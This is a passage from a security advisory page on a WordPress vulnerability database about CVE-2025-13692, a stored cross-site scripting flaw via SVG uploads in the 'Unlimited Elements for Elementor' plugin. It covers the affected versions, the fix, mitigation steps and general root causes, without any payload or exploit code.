WWordPress Vulnerability Database

Hong Kong Security Alert Unlimited Elements XSS(CVE202513692)

Cross Site Scripting (XSS) in WordPress Unlimited Elements For Elementor (Free Widgets, Addons, Templates) Plugin
0
Shares
0
0
0
0
Plugin Name Unlimited Elements For Elementor
Type of Vulnerability XSS
CVE Number CVE-2025-13692
Urgency Medium
CVE Publish Date 2025-11-27
Source URL CVE-2025-13692

Urgent Security Advisory: Stored XSS via SVG Upload in “Unlimited Elements for Elementor”

Date: 2025-11-27  |  Author: Hong Kong Security Expert

This advisory describes a stored Cross-Site Scripting (XSS) vulnerability (unauthenticated) in the “Unlimited Elements for Elementor” plugin affecting versions ≤ 2.0. The issue can be triggered by uploading a crafted SVG which, when stored and served, executes arbitrary JavaScript in visitors’ browsers. The vendor released a fix in 2.0.1. Treat this as a high-priority patch window — automated scanners and opportunistic attackers rapidly scan for such exposures.

Quick summary (for busy site owners)

  • Vulnerability: stored XSS via SVG upload affecting Unlimited Elements for Elementor ≤ 2.0.
  • Fixed in 2.0.1 — update immediately where possible.
  • If patching is delayed: disable SVG uploads, remove untrusted SVGs from uploads, and deploy content-inspection WAF rules to block executable SVG markers.
  • Rotate admin credentials, review logs for suspicious uploads, and follow the detection and recovery steps below if compromise is suspected.

What is the vulnerability (high level)?

SVG is XML and can include executable constructs (scripts, event attributes, embedded HTML). When an application accepts SVG uploads without robust sanitization and later serves them (inline or in pages), the uploaded data becomes a stored XSS vector. This issue allows an unauthenticated attacker to upload a crafted SVG containing executable payloads; any visitor loading the page that includes that SVG may execute the attacker’s JavaScript.

Root causes (typical)

  • Allowing unauthenticated or insufficiently restricted file uploads.
  • Insufficient server‑side sanitization of SVG content (failure to strip scripts, on* attributes, ).
  • Serving SVGs inline or with headers that allow execution in page context.
  • Insufficient access control on upload endpoints.

Why SVGs are risky

SVG is not a passive image format. It is XML that supports: